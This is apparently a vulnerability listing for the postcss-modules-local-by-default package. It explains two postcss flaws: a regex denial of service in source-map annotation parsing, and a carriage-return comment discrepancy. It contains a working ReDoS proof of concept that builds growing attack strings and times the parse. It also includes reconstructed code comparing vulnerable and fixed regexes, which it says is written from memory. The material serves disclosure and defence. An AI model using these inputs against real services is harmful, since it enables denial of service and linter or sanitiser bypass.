postcss-modules-local-by-default is a PostCSS plugin for projects that use CSS Modules: it makes local scoping the default for class selectors, so a class is local unless it is explicitly marked global. Between versions 0.0.9 and 0.0.10 the notable change is the css-selector-tokenizer dependency, raised from 0.4.0 to 0.5.1. The bump looks minor, but css-selector-tokenizer is what the plugin uses to parse and rewrite selectors, so the upgrade likely carries bug fixes and behavioural changes in selector handling even though the plugin's own code did not change.
For users of postcss-modules-local-by-default the core functionality is unchanged: classes are scoped locally unless explicitly declared global, which prevents unintended style collisions and keeps CSS modular and predictable in large codebases. The plugin drops into an existing PostCSS pipeline and is a straightforward way to adopt CSS scoping as a default rather than a convention. It is MIT-licensed, and its development dependencies (eslint, istanbul, coveralls) indicate that linting and test coverage are part of its release process.
All vulnerabilities affecting version 0.0.10 of the package
Regular Expression Denial of Service in postcss
postcss versions before 7.0.36, and 8.x versions from 8.0.0 up to (but not including) 8.2.13, are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
A stylesheet containing many source-map annotation openers and no closing */ makes the regex backtrack over the remaining input once per opener, so parse time grows super-linearly with input length. The following proof of concept times postcss.parse() on such input:
var postcss = require("postcss")

// Build "a{}" followed by n source-map annotation openers. No closing "*/"
// ever appears, so the annotation regex must backtrack over the whole tail
// for every opener.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up: a well-formed annotation parses instantly.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Grow the attack string in steps of 1000 openers and time each parse. On a
// vulnerable version the reported time rises far faster than the length does.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
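The proof of concept above drives the whole parser, which hides where the time goes. The block below is an added example, not code from this page or from PostCSS: it isolates the annotation lookup in the shape it had before postcss 7.0.36 / 8.2.13 beside a non-backtracking rewrite of the kind the fix moved to (regex only for the fixed-length marker, indexOf/lastIndexOf for the variable part). The regex text, the function names and the attack-builder are reconstructed here and should be treated as assumptions, not as verbatim library code.

```javascript
// Added example (not code from this page or from PostCSS): the source-map
// annotation lookup in its pre-fix shape beside a non-backtracking form.
// Regex text and function names are reconstructions and are assumptions.

// Pre-fix shape: one regex finds whole annotations. After "# sourceMappingURL="
// the greedy ".*" runs to the end of the line, then backtracks one character
// at a time looking for "\s*\*\/". With many openers and no "*/" that repeats
// for every opener, so the work grows with the square of the input length.
const VULNERABLE_ANNOTATION = /\/\*\s*# sourceMappingURL=.*\s*\*\//gm;

function loadAnnotationVulnerable(css) {
  const annotations = css.match(VULNERABLE_ANNOTATION);
  if (!annotations || annotations.length === 0) return null;
  const last = annotations[annotations.length - 1];
  return last.match(/\/\*\s*# sourceMappingURL=(.*)\s*\*\//)[1].trim();
}

// Hardened shape: the regex only matches the fixed-length marker. Locating the
// last marker and its closing "*/" is done with lastIndexOf/indexOf, which scan
// linearly and cannot backtrack, so a missing "*/" costs one pass, not n passes.
const ANNOTATION_MARKER = /\/\*\s*# sourceMappingURL=/gm;

function loadAnnotationHardened(css) {
  const markers = css.match(ANNOTATION_MARKER);
  if (!markers) return null;
  const start = css.lastIndexOf(markers.pop());
  const end = css.indexOf("*/", start);
  if (start === -1 || end === -1) return null;
  return css
    .substring(start, end)
    .replace(/^\/\*\s*# sourceMappingURL=/, "")
    .trim();
}

// Constructed inputs: one well-formed annotation, and the PoC's attack shape
// (n openers, no closing "*/").
const BENIGN_CSS = "a{}\n/*# sourceMappingURL=a.css.map */";

function buildAttack(n) {
  let css = "a{}";
  for (let i = 0; i < n; i++) css += "/*# sourceMappingURL=";
  return css + "!";
}

function timeMs(fn, css) {
  const t0 = Date.now();
  fn(css);
  return Date.now() - t0;
}

// Both versions agree on valid input...
console.log("benign:", loadAnnotationVulnerable(BENIGN_CSS), loadAnnotationHardened(BENIGN_CSS));

// ...but only the vulnerable one slows down as the attack string grows. n is
// kept small so this finishes quickly; the vulnerable column grows roughly
// quadratically in n, the hardened one stays flat.
for (const n of [500, 1000, 2000]) {
  const css = buildAttack(n);
  console.log(
    `n=${n} len=${css.length} vulnerable=${timeMs(loadAnnotationVulnerable, css)}ms ` +
      `hardened=${timeMs(loadAnnotationHardened, css)}ms`
  );
}
```

The design point is the one behind the real fix: anything of attacker-controlled length (the URL, the gap before */) is located with linear string scans, and the regex is left only with the fixed marker it can match in constant time per position. When reviewing regexes over untrusted input, look for a greedy quantifier followed by a required literal that may be absent; that shape alone is enough to turn a missing delimiter into quadratic work.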
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can craft CSS so that it contains parts a browser treats as a CSS comment but PostCSS does not; after processing by PostCSS, those parts appear in its output as CSS nodes (rules, declarations) despite having been inside a comment in the original. A linter or sanitiser that relies on PostCSS therefore reasons about a different stylesheet from the one the browser will apply.
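The mechanism can be reproduced without installing PostCSS. The block below is an added example, not code from this page or from PostCSS: it isolates the parenthesis branch of PostCSS's tokenizer in miniature. The two RE_BAD_BRACKET patterns are written from memory of lib/tokenize.js before and after 8.4.31, and the surrounding logic is a simplification of that branch; treat both as assumptions rather than verbatim library code.

```javascript
// Added example (not code from this page or from PostCSS): a miniature of the
// tokenizer's "(" branch. The two regexes are recalled from lib/tokenize.js
// before and after 8.4.31 and are assumptions, not verbatim library code.

// The character class decides whether "(...)" may be swallowed as one
// 'brackets' token. Before the fix, \r was not in it. Because "." in a JS
// regex never matches \r either, "(\r/*)" contains no "any char followed by a
// bad char" pair at all under the old pattern.
const BAD_BRACKET_BEFORE_8_4_31 = /.[\n"'(/\\]/;
const BAD_BRACKET_FIXED = /.[\r\n"'(/\\]/;

// On "(", the tokenizer finds the next ")" and, unless the slice contains a
// character that cannot live in a bare brackets token, emits the whole slice as
// one 'brackets' token. Anything inside, including "/*", is then never seen by
// the comment scanner. Otherwise it emits a lone "(" and keeps scanning, so a
// following "/*" opens a comment, as it does in a browser.
function tokenizeParenthesised(css, openPos, badBracketRe) {
  const close = css.indexOf(")", openPos + 1);
  const content = css.slice(openPos, close + 1);
  if (close === -1 || badBracketRe.test(content)) {
    return { type: "(", value: "(", commentSuppressed: false };
  }
  return { type: "brackets", value: content, commentSuppressed: content.includes("/*") };
}

// Tokenize the first "(" in a stylesheet under a given bracket rule.
function classifyFirstParen(css, badBracketRe) {
  return tokenizeParenthesised(css, css.indexOf("("), badBracketRe);
}

// Constructed inputs: the advisory's example, and the same with \n for contrast.
const CR_INPUT = "@font-face{ font:(\r/*);}";
const LF_INPUT = "@font-face{ font:(\n/*);}";

for (const [label, re] of [
  ["before 8.4.31", BAD_BRACKET_BEFORE_8_4_31],
  ["8.4.31+      ", BAD_BRACKET_FIXED],
]) {
  console.log(label, "CR:", JSON.stringify(classifyFirstParen(CR_INPUT, re)));
  console.log(label, "LF:", JSON.stringify(classifyFirstParen(LF_INPUT, re)));
}
```

With the pre-fix pattern the \r variant yields a brackets token whose value is "(\r/*)", so PostCSS closes the declaration at ";}" and parses whatever follows as ordinary CSS. A browser tokenizes per CSS Syntax Level 3, where "/*" starts a comment anywhere outside a string or an unquoted url(), so it comments out everything from that "/*" to the next "*/". The \n variant, and every variant under the fixed pattern, yields a lone "(" and the same comment the browser sees. The practical check for a linter is the one the fix made: every line terminator the CSS grammar recognises (\n, \r, \f) must be in the bad-bracket class, not just \n.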